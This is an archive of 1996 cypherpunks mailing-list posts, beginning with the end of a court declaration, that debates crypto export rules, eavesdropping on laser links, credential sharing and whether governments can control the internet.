International
Relay Chat Channel #scientology as of late.  And, as I said before,
even
though I believe I know who is responsible, I can't prove it.  However,
I
would like the Court to take judicial notice of it in the event this
type of
operation occurs again or in a similar fashion to interfere with my
right to
litigate this case.  

	14.	I declare under penalty of perjury that the aforementioned
facts
set forth are true and correct.



Respectfully Submitted,			Dated:  February 14, 1996


___________________________
Steven Fishman
Plaintiff Pro Se
12980 S. W. 48th Street
Fort Lauderdale, Florida  33330-2339




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gw <geeman@best.com>
Date: Fri, 16 Feb 1996 17:38:12 +0800
To: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Subject: Re: anonymous age credentials, sharing of
Message-ID: <199602160754.XAA17607@news1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:24 PM 2/15/96 -0500, you wrote:
>On Thu, 15 Feb 1996, gw wrote:
>
>> the People, want to support permanently binding a traceable, non-anonymous
>> identity to all certificate attributes that are used in electronic exchange
>> (age, etc...) then there is going to be the potential for someone to
>> deliberately allow their credential to be misused.
>> 
>> IMO, to prevent this totally would require implanting a non-forgable i.d.
>> chip in everyone at birth ..... not very appealing.
>

>And even then, what about the people that undergo surgery to swap chips?
>

Seems less likely ... you would need qualified surgeon, etc. ... my
suspicion is that biometric devices are actually more susceptible to bypass .

>The only REAL way of authentication is biometrics.  Anything else can be 
>swapped.  

For that matter, if you can replace an amputated finger, how about
transplanting a hand?  <shrug> 

I think the distinction between an implanted device and a naturally occuring
biometric is 1. not that important, 2. not all that large, anyway.

My point is -and I think this pretty obvious- without the "something someone
IS" 
as opposed ot "HAS" there is no stopping the exchange of credentials.  And
then as you go to "HAS", it's just a matter of how far you want to raise the
bar.

I like that idea of surgically swapping tokens ... where do I find the Dr.?
Assuming s/he's illicit, then where do I get the $?  And the person to swap
with?  What's in it for him/her?

>But if you amputate someone's hand or retinas then they won't 
>work(check for things like blood flow, etc.)
>
>Ben.
>____
>Ben Samman..............................................samman@cs.yale.edu
>"If what Proust says is true, that happiness is the absence of fever, then
>I will never know happiness. For I am possessed by a fever for knowledge,
>experience, and creation."                                      -Anais Nin
>PGP Encrypted Mail Welcomed      Finger samman@powered.cs.yale.edu for key
>Want to give a soon-to-be college grad a job?         Mail me for a resume
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gw <geeman@best.com>
Date: Fri, 16 Feb 1996 17:34:38 +0800
To: lwp@conch.aa.msen.com
Subject: Re: Using lasers to communicate
Message-ID: <199602160803.AAA17730@news1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:38 AM 2/14/96 -0500, you wrote:
>
>Eavesdropping and channel-blocking and physical-location-discovery are 
>related threats to which most traditional data channels are susceptible.  
>Any link which depends on a physical conduit (phone line, fiber, coax)
>is relatively easy to interrupt and to trace to its end points.
>RF links, even with frequency hopping, are subject to triangulation and
>jamming.  All these kinds of links can be eavesdropped.
>
>Point-to-point conduitless laser signalling, as envisioned by "Bill" and
>Tim in their quotes below, eliminates or reduces these threats. 

not as much, IMHO, as you would seem to suggest.  50% mirrors picking off
those laser beams would do it, and you could not detect the resulting
attenuation as distinct from naturally ocurring attenuation and variation.  


>Now consider an enhancement.  In show business, we sometimes entertain
>the folks with "laser light shows".  The technology used is fairly
>straightforward, mainly involving the use of mirrors (the effect also uses
>smoke ususally, but please don't prematurely dismiss my remarks on this
>basis).  The laser source is attached to a "laser table" which holds a 
>number of small mirrors which may be individually inserted (via fast
>solenoids) into the path of the laser beam.  Each of these mirrors is then
>calibrated to aim at a particular place in the theatre, usually another
>larger mirror.  Then (under computer control) the various small mirrors
>on the laser table are rapidly inserted and withdrawn from the light beam,
>causing the laser beam to follow first one path, then another, then another
>through the (smoky) air -- all to the delight of the audience.
>
>This technology could easily be adapted to make a communication channel
>safer from the various threats of eavesdropping, interruption, and tracing.
>A single point-to-point channel could be made to follow various paths 
>having common elements only VERY close to the endpoints.  Better still,
>a network of more than two nodes could be constructed without needing to
>provide multiple transceivers at each node (and with possibly multiple 
>beam paths between each pair).  With known methods of routing and
>collision avoidance, we could thus not only route around any known opposition
>but also make it very expensive to eavesdrop or even to discover that 
>a signal exists.  ("Honey, call the EPA again -- those gubmint boys are back,
>driving their oil-burning old van around Mr. May's house.").
>

KNOWN opposition ... hmmm.  you're back to obscurity=security.
It's always expensive to eavesdrop (tapped any fiber cables in pressure
jackets recently?) ... and (having been in the same business as yourself
once) alignment and bandwidth problems of them pesky little scanners is a
pretty hefty problem.

The concept seems to have merit ... but I don't think I'd want to have to
implement it!
Easily adapted .... ?????

>[previous attribution unknown...:]
>} >>With a tightly focused beam (light is easy, I don't know about lower
>} >>frequencies), you can prevent interception except by very obvious physical
>} >>devices.  (e.g. Someone in a cherry picker truck.)  You may be able to
>} >>avoid the need to encrypt the link (and all the paranoia about key
>} >>management, advances in factoring etc. that that implies.)
>} >>
>} >>Bill
>
>On Thu, 4 Jan 1996 12:45:15 -0800, tcmay@got.net (Timothy C. May) wrote:
>} 
>} Just a couple of points on this optical idea.
>} 
>} We were linking buildings a mile apart in the 70s, at Intel. We needed to
>} ship CAD data back and forth, and PacBell rates for a dedicated line were
>} outrageous, slow to be installed, etc. So, a commercially available laser
>} and modulator/demodulator (modem, but it bears sometimes using the longer
>} version, to remind people of what it is doing in general) were mounted on
>} the roofs of our buildings. I'm sure various packages are commercially
>} available to do this.
>[snip] 
>} I'm actually more positive on low-level (below safety regs get interested
>} in) light than on free space RF, for bypassing of the local cable/phone
>} monopolies. There's just not enough "bandwidth of free space" available. Do
>} the math.
>[snip]
>
>
>::::::::::::::::::::::::::::::::::::::
>::  Lou Poppler <lwp@mail.msen.com> ::  " The more you drive, 
>::      http://www.msen.com/~lwp/   ::    the less intelligent you are."
>::::::::::::::::::::::::::::::::::::::    -- Repo man
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: C Matthew Curtin <cmcurtin@gatekeeper.cb.att.com>
Date: Sat, 17 Feb 1996 11:19:36 +0800
To: "Sentient1" <Shade@cdale1.midwest.net>
Subject: Re: PGP
In-Reply-To: <199602160232.UAA04240@cdale1.midwest.net>
Message-ID: <199602160505.AAA24625@boaz>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Sentient1" == Sentient1  <Shade@cdale1.midwest.net> writes:

Sentient1> Esteemed GentlePersons, Could you settle a dispute?  Is it,
Sentient1> or Is it not, legal to take PGP source code and the like
Sentient1> out of the country if it is written on paper?

Yes, it is legal to export cryptographic source code in printed form -
the exact same code that is illegal to carry out on a floppy
disk. (See the preface to Zimmermann's book "PGP Source Code and
Internals," published by MIT Press.)

- --
C Matthew Curtin    [AT&T|Bell] Labs     Internet Gateway Applications Group
http://www.att.com/homes/matt_curtin.html PGP OK cmcurtin@gatekeeper.att.com

-----BEGIN PGP SIGNATURE-----
Version: 2.7.1
Comment: Have you encrypted your data today?

iQCVAwUBMSQQqRhyYuO2QvP9AQEGIwP8DpMGvtZi2pWeFlicArVNyhAoeJxq+oR0
mXQN0E3EWW5GBujfd7TSJhMsPddXXJOaO+4HDoV8E7Q6D4kE3/GiHx6E8uBJ0Zdb
8Q77oXChYWrSB/p5HTwDoxGyk4svFMkey88X+Y/9JYia2ZBtoSEPl2WAJd8mhkTZ
FPNugHTdfMg=
=8y6/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Fri, 16 Feb 1996 15:39:01 +0800
To: cypherpunks@toad.com
Subject: Berkeley ftp site moved again?
Message-ID: <Pine.A32.3.91.960215235843.26516A-100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


I've been unable to get through to ftp.csua.berkeley.edu
and www.csua.berkeley.edu for the past two days.

Does anyone know if the site (and the cpunk archives with it)
has moved or if it's just down? (I'd mail root, but what's the
point if the machine's down?)

Sorry if I've missed this being mentioned before.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmca@alpha.c2.org (Chris McAuliffe)
Date: Fri, 16 Feb 1996 17:52:59 +0800
To: cypherpunks@toad.com
Subject: Re: PGP
Message-ID: <199602160832.AAA11104@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[To: cypherpunks@toad.com]
[Subject: Re: PGP]

It was written (not on paper) by "Sentient1" <Shade@cdale1.midwest.net>:
>      Could you settle a dispute?  Is it, or Is it not, legal to take
>PGP source code and the like out of the country if it is written on
>paper?

Yes it is. MIT published a book consisting of nothing but PGP source in
OCR type, and it has been exported.

Chris McAuliffe <cmca@alpha.c2.org> (No, not that one.)

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMSQ2ZoHskC9sh/+lAQEd0gP/ZSj0lQYlWN9XxDEzSCRRSnt13TKG3DYU
cqGLcbJb9hsp7Ye4+oW8Ei1+iXGOX/2u/TB7gNfQQ0MFR96bqSl0VzCq1R1Z4vqC
vb6lv2pURpMwltTy7+k3gWx2p6Dsc6uTXC8ydTLKcWLg9o98JsR8ZtnxyOdzWtGM
SoeaAP+T7Wk=
=25iG
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Sat, 17 Feb 1996 05:23:35 +0800
To: cypherpunks@toad.com
Subject: Re: AT&T Public Policy Research -- hiring for cypherpunks
Message-ID: <v02140b00ad4977d6b10a@[199.2.22.124]>
MIME-Version: 1.0
Content-Type: text/plain


Bill Franz writes:
> Adam Shostack wrote:
[...]
>>IP numbers are not portable, DNS names are.  You can move toad.com
>>anywhere on the network, but you can't move 140.174.2.1 anywhere on
>>the network.
>
>FYI - IP portability, both in the sense of disconnecting in one place and
>reconnecting in another and in the sense of keeping a TCP connection alive
>while moving from place to place are design goals of IPv6

But IPv6 also brings link-level encryption and makes subliminal
communications channels trivial; Big Brother (now does anyone know
what that that translates to in Chinese?) won't stand for that...

The enhancements of IPv6 make a lot more possiblities for
secure channels and untracable packet-level communications
available.  Instead of needing to jump through many hoops
you just have to subvert one of the new goodies IPv6 gives
you for free :)

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nemesis <richier@Onramp.NET>
Date: Fri, 16 Feb 1996 17:25:54 +0800
To: cypherpunks@toad.com
Subject: (no subject)
Message-ID: <3124373E.20DC@onramp.net>
MIME-Version: 1.0
Content-Type: text/plain


I have lost the address to the page to join cypherpunks can anyone help 
me A friend needs it ..
                         thanx
				Nemesis




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Fri, 16 Feb 1996 17:05:05 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Cypherpunks Decency Act
Message-ID: <199602160714.CAA10060@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


I tried to make this a private reply to jdoe-agamemnon@alpha.c2.org, but it 
bounced:

Forwarded message:
> From: MAILER-DAEMON@alpha.c2.org
> Subject: mail failed, returning to sender
> 
> Unknown addressee: jdoe-agamemnon@alpha.c2.org
> 
> ----- Unsent Message Follows -----
[...]
> > Bill Frantz wrote:
> > >Perry sent me a polite note asking why I had posted the original post, and
> > >He suggested that in the future I make it clear why I think my posts are
> > >relevent to the subject of the list.
> > 
> > Is this what we call the chilling effect?
> 
> Nope, not unless Perry has some position of authority w.r.t. Bill Frantz.
> I'm not aware of any such consideration.

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Fri, 16 Feb 1996 17:11:39 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: National Cryptologic Museum (Noise)
In-Reply-To: <199602151257.NAA19309@utopia.hacktic.nl>
Message-ID: <199602160735.CAA10125@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


If you're going to ask silly questions, it would be polite to provide a
private reply mechanism.

Anonymous writes:
> I peeled this off of Usenet, Wondering if this is Tim doing a little=
>  trolling?
[...]
> --(fwd)--
> 
> Hi all,
> 
> If you've never heard of the National Cryptologic Museum and have an
[...]
> Christopher C. May, M.D.

There's a "Christopher May" who has posted to the cypherpunks list before.
(Check the archives, and no, don't ask me where....)

Based on the message contents, it's not clear to me why you think this 
could have been a troll, but who the hell cares anyway ?

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Fri, 16 Feb 1996 17:21:10 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunks Decency Act
Message-ID: <v02120d01ad49e69bb58c@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 9:43 PM 2/15/96, jdoe-agamemnon@alpha.c2.org wrote:

>>Perry sent me a polite note asking why I had posted the original post, and
>>He suggested that in the future I make it clear why I think my posts are
>>relevent to the subject of the list.
>
>Is this what we call the chilling effect?

        No.
        bell@pacifier--surely not a coincidence--has indulged himself
excessively. Anyone checked out the LD angle on him? I'm not given over to
conspiratorialism, but, really...there's hardly much satisfaction in
exercising your D-key "right" when the result is emptiness.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Fri, 16 Feb 1996 17:57:02 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Firewall USA to Firewall China
In-Reply-To: <199602140540.XAA09402@proust.suba.com>
Message-ID: <199602160849.DAA10400@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Alex Strasheim writes:
> For what it's worth, I have a friend who just got a job with Apple's
> operation in China.  According to him, Hong Kong is fully wired, but
> mainland China only has about 5,000 net accounts outside of government or
> acadamia.  All 5,000 of those accounts seem to be served by a single 64kbs
> connection to the outside world, which suggests that they're email only.

In that case, I expect it will be fascinating to see what happens to *.hk
when it gets swallowed by China. Presumably the Chinese govt. will at least
try to enforce the regulations (registration etc.) it has announced so far.

What is the Hong Kong part of the net doing in anticipation of the 
transition ?  Depending upon what happens in the next couple of years, it
seems to me that *.hk could be an impressive Trojan horse for the mainland
authorities to handle. I suggest that anyone who wants to deploy crypto tools
behind the Great Firewall should seriously consider outfitting the Hong Kong
populace with them.

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Fri, 16 Feb 1996 18:16:40 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: A Cyberspace Independence Refutation
In-Reply-To: <Pine.3.89.9602120919.A6693-0100000@dal1820.computek.net>
Message-ID: <199602160925.EAA10473@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Ed Carp writes:
> If the Feds pulled the plug on the 
> backbone, I can see that there are a lot of people who would drag UUCP 
> and pathalias out of the closet, and the UUCP Mapping Project would live 
> again (hams have their own backbone are would be not as severely affected 
> by the backbone going away).
>
> Not that it wouldn't be hard - but it's doable.

I generally agree with this. But this would not be "the net as I know it"
by any stretch of my imagination. Most of the people who get high priority(*)
in my incoming mail wouldn't start doing UUCP. We could still do some
version of the cpunks list, but at some point I would lose some enthusiasm
for a "means to an end" that is just an end in itself.

(*) or rather, they will when I get my .procmailrc debugged

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 17 Feb 1996 19:35:33 +0800
To: cypherpunks@toad.com
Subject: OECD international crypto policy
Message-ID: <199602160340.EAA24430@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



gnu@toad.com (John Gilmore) wrote:


>It would be interesting to see notes from other 
>participants in the  same OECD meeting(s).  Another 
>1-hour meeting was scheduled in  Canberra on Feb 9.  
>Anyone know what happened there?


The Feb 9 session of the "Group of Experts" Mr. Gilmore 
mentions was restricted to official OECD delegations.  See:


     http://www.nla.gov.au/gii/programl.html


Papers of the open conference on Feb 7 and 8 were promised 
posting on the Web concurrently but none have yet appeared at:


     http://www.nla.gov.au/gii/papers.html


Cryptographers Quisquater, Denning and Diffie (and others at 
the Paris December sessions) were scheduled for Feb 7 and 8. 
Professor Denning was listed to give "The Future of 
Cryptography" discussed on cypherpunks a while back.


Perhaps a public-spirited participant will share the fruits of 
the open and restricted events, as with the Paris gathering.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Fri, 16 Feb 1996 18:39:15 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: A Cyberspace Independence Refutation
In-Reply-To: <URL:http://www.hks.net/cpunks/cpunks-24/0354.html>
Message-ID: <199602161003.FAA10539@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


James Donald writes:
[in reply to strata]
> Your other arguments casually dismiss the very real power that large numbers 
> of able people with good communications can exercise, have just exercised
> very recently.

Large numbers of able people with good communications very recently exercised 
their putative "very real power" against the passage of the CDA. They had no
substantial impact AFAICS. (I intend no slur against the effort.)  Could you
name some examples, and add some qualifications that made the difference in
those cases ?

> Nation states are a new creation. In the past many different 
> kings ruled many different bits of one nation, and one king often 
> ruled parts of more than one nation.
>
> Today nation states are almost universal, and people can no longer 
> imagine what a nation is, other than a nation state. 

Just in case I'm one of those who "can no longer imagine what a nation is,
other than a nation state", you should perhaps define the term more
concretely. I guess The Nation of Islam might fit, or the worldwide
community of Palestinians.

> But the net is a nation, and is not a state, and nationalism is a force that 
> governments usually cannot withstand.

OK, first of all I'm not convinced that the net qualifies as a "nation", but
it's hard to say until I better understand what you mean by "nation".

_Strong_ nationalism is a powerful force that governments often exploit to
their own considerable advantage, and indeed also brings down governments
in some cases. Offhand, it looks to me as though the USSR did a decent job
of withstanding various strong internal nationalistic forces for a long time, 
and was brought down mainly by other considerations.

> What makes a government strong is its cohesion, but the state cannot
> create its own cohesion. When states attempted to confront nationalism, 
> they often lost cohesion and vanished altogether, like a string of sand. 
>
> The "Nation state" is in essence a tactic for avoiding this hazard.

Perhaps "often" is the case; from previous experience, I suspect your grasp 
of the relevant history is clearly superior to mine. (You have some great
stuff on your web pages.) I note that you did not claim "all".

> Governments are acutely aware of this problem, and act very cautiously 
> in the face of such threats. Many people seem to imagine that a 
> government innately and naturally has cohesion, that it is naturally 
> one thing, naturaly capable of acting coherently and cohesively as 
> an individual can. On the contrary, governments maintain their 
> cohesion with difficulty, and continually act, or refrain from acting,
> in fear that they might lose it.

OK, but govts. do indeed manage to muster plenty of cohesion in various
actions. 

> In an all out knock down battle between a particular government and the
> internet, in a state where a substantial proportion of the middle class
> was on the internet, the government would be in serious danger of 
> evaporating like a jellyfish in the sunshine.

I disagree, but assertions will get us nowhere.

> The government can get away with a substantial amount of harassment and 
> restraint, but has only limited power to act without itself being acted 
> on, to change the world without itself suffering change.

Sure, but the govt. has been changed before and can change again.

I'm honestly very happy to see all this optimism. But unless and until my
pessimism fundamentally changes, I couldn't sleep at night if I were to lie
down and accept the optimistic claims.

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Sat, 17 Feb 1996 17:29:27 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: A Cyberspace Independence Refutation
In-Reply-To: <199602121635.IAA11515@shell1.best.com>
Message-ID: <199602161022.FAA10566@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


I wrote:
# I'm afraid I'm not willing to take [vulnerability of the state] on faith. 

James Donald writes:
> You delete my arguments, and then say:  "I am not willing to take this on
> faith", implying that I made no arguments.

Frankly, I though much of what you said was not really in the form of an
argument, and thus did not bear response. At any rate, see my message prior
to this, in which I have gone back and responded to everything I didn't
explictly address before.

I wrote:
# Strata made some good observations about the tangible vulnerability of 
# the net-as-we-know-it to government intervention.

James Donald writes:
> During the American revolution, the British troops could go where they
> pleased, and destroy whatever they wished, but they could not obtain
> political control by so doing.

It helped that Americans formed an army and otherwise took up arms against
the limeys. (ObImpunity: I'm a limey by birth.) Ah, I see you are about to
address the difference between flying-lead wars and flying-electron wars
below....

> Yes, we are vulnerable, and so are they.  If they used the measures
> proposed by Strata, the measures proposed by Jim Bell would gather 
> wide support.

I disagree. I presume that Jim Bell will now pounce, call me a "fucking
statist" or some such, and induce many folks to killfile the remainder of
this thread. I don't plan to respond to anything he says about this. 

(Are we witnessing the birth of a new corollary to Godwin's Law ?)

> Ob Crypto:
> 
> They cannot obtain political control by mere acts of destruction, because 
> they cannot be sufficiently selective in who they silence.

I disagree. (This level of debate seems rather unproductive.) 

> For destruction to be effective, you must not only harm those who oppose
> you, you must refrain from harming those who do not oppose you.  

I disagree. It seems to me that all sorts of "innocent bystanders" etc.
get mowed down, usually at no noticeable detriment to the mowers. Since
this thread is already doomed, I'll plough ahead and suggest that lots of
people who didn't oppose the U.S. were obliterated by Fat Man and Little
Boy, and yet the Enola Gay's mission(s?) was/were effective for the USG. 

> The destructive acts proposed by Strata conspicuously fail to do this.

Probably true.

> Under the extreme conditions that Strata envisages, the measures proposed 
> by Jim Bell would be effective in obtaining politically desired consequences,
> because they are selective and targeted, and the measures that Strata fears
> would be ineffective in obtaining the politically desired consequences, 
> because they are unselective and untargeted.

See my comments above.

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Fri, 16 Feb 1996 19:10:34 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: A Cyberspace Independence Refutation
In-Reply-To: <v01530500ad4522b6d733@[206.138.118.125]>
Message-ID: <199602161025.FAA10582@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


lunaslide writes:
> One think does stand to reason though, when govt gets in the way of
> business, govt eventually gets run over.  Regulating the net in content
> brings them one step closer to obsolescence.  The govt is not yet in it's
> death throwes, but it has seen it's own fate.  The net regulation is one
> more feeble attempt at avoiding destiny.  

The interests of business are not nearly coincident with my interests,
although there is some nontrivial overlap. This is unfortunate but not
surprising, IMHO.

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zachary R Amsden <amsden+@andrew.cmu.edu>
Date: Fri, 16 Feb 1996 19:44:03 +0800
To: cypherpunks@toad.com
Subject: Patents and Trademarks invalid
Message-ID: <El96Bru00iWU80irw4@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Here's an idea: whenever someone uploads something like the RC2 source code,
why not have everyone attach it to their .signature?  Is criminal justice
seriously going to pursue tracking down millions of people that did this?
Or would they pull the plug.

Food for thought

(please don't e-mail me about this - I have enough e-mail already.  Post
instead)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Fri, 16 Feb 1996 20:17:45 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: A Cyberspace Independence Refutation
In-Reply-To: <2.2.32.19960212202324.006e8ee8@panix.com>
Message-ID: <199602161113.GAA10654@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


I'm counting my blessings for not suffering carpal tunnel syndrome yet, so
I'll chime in here before we hear back from Strata.

Duncan Frissell writes:
> Operation Sun Devil happened in 1990.  A couple of BBS' were shut down.  It
> hasn't been repeated much since.  There are currently more than 7,000
> commercial ISPs in the world.  At one or two shutdowns per decade, it will
> take a while.  

Assuming shutdowns continue at the same rate, which is a rather large
assumption that I happen to doubt.

> Note too that an ISP is more like a carrier (common or not)
> than like a publisher.  Legal difficulties for the Feds.

>From what I have read here and heard elsewhere from lawyers, common carrier
status gets decided by the courts, and hasn't been conferred definitively on
ISPs or anonymizers/pseudonymizers, etc.

> Even harder in the future when 100 million households worldwide have full-
> time net access running on real multitasking workstations.

We'll see....

> I'm waiting.  Then I'll have to call all the way to Montreal to log on.

So much for the-net-as-I-know-it, where people don't have to call outside
the country just to log in to the net. Most of the people I want on the net
are very unlikely to do this.

> They will have a lot of fun trying to *find* all the ISPs though.  There are
> quite a few and that still leaves company, academic, government, and private
> TCP/IP servers up.

Presumably the govt. can use all the same means everyone else will be using
to find ISPs. They can also go around tracking physical net connections etc.,
which is out of reach for most folks.

Meanwhile the govt. will have coerced *.gov and *.edu and the corporate
sites to establish and enforce restrictive local use policies.

Strata wrote:
# I assume it surprises no one that much of the
# major flack about the net began when it became widely known to
# government that the net considered itself anarchic.

Duncan Frissell writes:
> It doesn't consider itself anarchic -- it is.  

(0) Strata did not claim that the net is not anarchic.

(1) Do you really believe that the net "doesn't consider itself anarchic" ???

[...]
> When one goes out into the marketplace, one encounters many different people
> and many challenges.  You must win acceptance from some of the other
> participants you find there.  There are mores.  You have to learn some of
> them or find others of your ilk who already share you mores.  It is not
> hard.  It is called life. 

Some mores are mostly bullshit. "The other ones are complete bullshit."
It is entirely consistent to defend everyone's right to his/her own set of
mores, and still attempt to convince some people that some of the mores they
observe are crocks. Many of the net.prejudices are particularly absurd,
counterproductive, and worthy of change, IMHO.

Strata wrote:
# WHAT PLANET ARE YOU FROM? Can someone take an anonymous poll of the
# Known Network and ask the following: "I routinely refrain from
# posting my opinions or beliefs to mailing lists and/or newsgroups for
# fear of flaming, harrassment, or ridicule, even when I am confident of 
# those beliefs or opinions

Duncan Frissell writes:
> A short survey of the Feed suggests that many other people
> continue to post at will.  Probably too many.  In fact, they obviously feel
> freer to do so on the net than in real life.

Uh, I guess that's why there's no need for anonymizers, pseudonymizers, etc. ?

[...]
> In modern capitalist societies like the US, it is possible to actually own
> fairly powerful computers yourself.  In fact, I understand that even the
> peasantry in America can put together the $200 for a used 386sx and the $39
> for a 14.4K modem and run a free copy of Linux and have a powerful TCP/IP
> server of their own.  

I'd be interested to see the documentation of the number of peasants in 
the U.S. (or elsewhere) who have done anything like this. Documentation of
the number of peasants who could manage the technical details would also
be interesting.

> The dialup connection is not permanent of course.  It
> can be bought from many local, national, and overseas providers.  

And of course, all peasants have plenty of disposable income to spend on
long-distance phone charges....

Strata wrote:
[yes, this is taken out of context]
# Yes, I should give up my political career and
# the hope of building new housing in my district, getting more school
# funding, etc for a bunch of twenty (or thirty)-something
# non-constitutents who think of me as a pustulent gastropod. I'll run
# right out and vote against TRA!!

Duncan Frissell writes:
> We (some of we) don't want the housing or the school funding either.  I
> certainly consider slave schools to be the most common form of child abuse
> in the world today.

That's nice, but are you seriously claiming that the portion of the average
set of voters in a Congressional district that strongly agrees with you on 
those issues matters a whit in a Congressional election ?

Strata wrote:
# How much do you go out of your way for people who openly despise you
# and publicly declare your stupidity with every other breath?

Duncan Frissell writes:
> Don't go out of your way.  Just stay out of our way.  Play golf instead.  

But the USG has to go out of its way to ignore creeps like Bob Dornan, just
for openers.

[...]
> Use another domain name.  Internic doesn't even have a monopoly of domain
> name assignment within the US.  If it casually screws around with too many
> people, it will guarantee further loss in market share.  

Well, for openers the USG can saddle all DNS companies with onerous
legal obligations. Let's not forget the stories we've heard about the
wiretap equipment set up at various telcos. Maybe it's high time for the
USG to _give_ a monopoly to InterNIC, or an ambitious competitor hungry for
market share.

Strata wrote:
# Find something original and concrete to do instead. Spend the five 
# minutes writing and *mailing* an original letter to your elected
# official and mention you are in his or her district. 

Duncan Frissell writes:
> This is *original*?

For many people, yes.

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Fri, 16 Feb 1996 20:13:14 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: [NOISE] Patents and Trademarks invalid
In-Reply-To: <El96Bru00iWU80irw4@andrew.cmu.edu>
Message-ID: <199602161118.GAA10682@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Zachary Amsden writes:
> (please don't e-mail me about this - I have enough e-mail already.  
> Post instead)

I'm confused. Instead of you alone getting a copy of every reply, you'd
prefer the scenario where you get a copy of every reply, and so does 
everyone else on the cypherpunks list, because _you_ get too much mail ?
How does this scheme reduce the amount of email you get ?  Are you not in
fact subscribed to cypherpunks ?

(I have no objection to everyone replying to the list; I just don't
understand how this eases the burden on ZA's mailbox.)

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
